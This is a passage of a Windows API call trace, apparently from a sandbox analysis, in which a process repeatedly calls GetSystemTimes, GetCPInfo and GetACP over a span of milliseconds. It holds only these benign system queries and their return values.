lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.509] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.509] GetACP () returned 0x4e4 [0178.509] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.509] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.509] GetACP () returned 0x4e4 [0178.509] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.509] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.509] GetACP () returned 0x4e4 [0178.509] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.509] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.509] GetACP () returned 0x4e4 [0178.509] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.509] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.509] GetACP () returned 0x4e4 [0178.509] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.510] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.510] GetACP () returned 0x4e4 [0178.510] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.510] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.510] GetACP () returned 0x4e4 [0178.510] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.510] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.510] GetACP () returned 0x4e4 [0178.510] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.510] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.510] GetACP () returned 0x4e4 [0178.510] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.510] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.510] GetACP () returned 0x4e4 [0178.510] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.510] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.510] GetACP () returned 0x4e4 [0178.510] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.511] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.511] GetACP () returned 0x4e4 [0178.511] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.511] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.511] GetACP () returned 0x4e4 [0178.511] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.511] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.511] GetACP () returned 0x4e4 [0178.511] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.511] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.511] GetACP () returned 0x4e4 [0178.511] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.511] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.511] GetACP () returned 0x4e4 [0178.511] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.511] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.511] GetACP () returned 0x4e4 [0178.512] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.512] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.512] GetACP () returned 0x4e4 [0178.512] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.512] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.512] GetACP () returned 0x4e4 [0178.512] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.512] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.512] GetACP () returned 0x4e4 [0178.512] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.512] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.512] GetACP () returned 0x4e4 [0178.512] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.512] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.512] GetACP () returned 0x4e4 [0178.512] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.513] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.513] GetACP () returned 0x4e4 [0178.513] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.513] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.513] GetACP () returned 0x4e4 [0178.513] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.513] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.513] GetACP () returned 0x4e4 [0178.513] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.513] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.513] GetACP () returned 0x4e4 [0178.513] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.513] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.513] GetACP () returned 0x4e4 [0178.513] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.513] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.513] GetACP () returned 0x4e4 [0178.513] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.514] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.514] GetACP () returned 0x4e4 [0178.514] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.514] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.514] GetACP () returned 0x4e4 [0178.514] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.514] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.514] GetACP () returned 0x4e4 [0178.514] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.514] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.514] GetACP () returned 0x4e4 [0178.514] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.514] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.514] GetACP () returned 0x4e4 [0178.514] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.514] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.514] GetACP () returned 0x4e4 [0178.514] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.514] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.515] GetACP () returned 0x4e4 [0178.515] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.515] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.515] GetACP () returned 0x4e4 [0178.515] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.515] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.515] GetACP () returned 0x4e4 [0178.515] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.515] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.515] GetACP () returned 0x4e4 [0178.515] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.515] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.515] GetACP () returned 0x4e4 [0178.515] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.515] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.515] GetACP () returned 0x4e4 [0178.515] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.515] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.516] GetACP () returned 0x4e4 [0178.516] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.516] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.516] GetACP () returned 0x4e4 [0178.516] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.516] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.516] GetACP () returned 0x4e4 [0178.516] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.516] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.516] GetACP () returned 0x4e4 [0178.516] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.516] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.516] GetACP () returned 0x4e4 [0178.516] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.516] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.516] GetACP () returned 0x4e4 [0178.516] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.517] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.517] GetACP () returned 0x4e4 [0178.517] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.517] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.517] GetACP () returned 0x4e4 [0178.517] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.517] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.517] GetACP () returned 0x4e4 [0178.517] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.517] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.517] GetACP () returned 0x4e4 [0178.517] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.517] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.517] GetACP () returned 0x4e4 [0178.517] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.517] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.517] GetACP () returned 0x4e4 [0178.517] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.518] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.518] GetACP () returned 0x4e4 [0178.518] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.518] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.518] GetACP () returned 0x4e4 [0178.518] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.518] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.518] GetACP () returned 0x4e4 [0178.518] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.518] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.518] GetACP () returned 0x4e4 [0178.518] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.518] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.518] GetACP () returned 0x4e4 [0178.518] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.518] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.518] GetACP () returned 0x4e4 [0178.518] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.519] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.519] GetACP () returned 0x4e4 [0178.519] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.519] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.519] GetACP () returned 0x4e4 [0178.519] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.519] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.519] GetACP () returned 0x4e4 [0178.519] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.519] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.519] GetACP () returned 0x4e4 [0178.519] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.519] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.519] GetACP () returned 0x4e4 [0178.519] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.520] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.520] GetACP () returned 0x4e4 [0178.520] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.520] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.520] GetACP () returned 0x4e4 [0178.520] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.520] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.520] GetACP () returned 0x4e4 [0178.520] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.520] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.520] GetACP () returned 0x4e4 [0178.520] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.520] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.520] GetACP () returned 0x4e4 [0178.520] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.520] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.521] GetACP () returned 0x4e4 [0178.521] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.521] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.521] GetACP () returned 0x4e4 [0178.521] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.521] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.521] GetACP () returned 0x4e4 [0178.521] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.521] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.521] GetACP () returned 0x4e4 [0178.521] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.521] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.522] GetACP () returned 0x4e4 [0178.522] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.522] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.522] GetACP () returned 0x4e4 [0178.522] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.522] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.522] GetACP () returned 0x4e4 [0178.522] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.522] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.522] GetACP () returned 0x4e4 [0178.522] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.522] GetCPInfo (in: 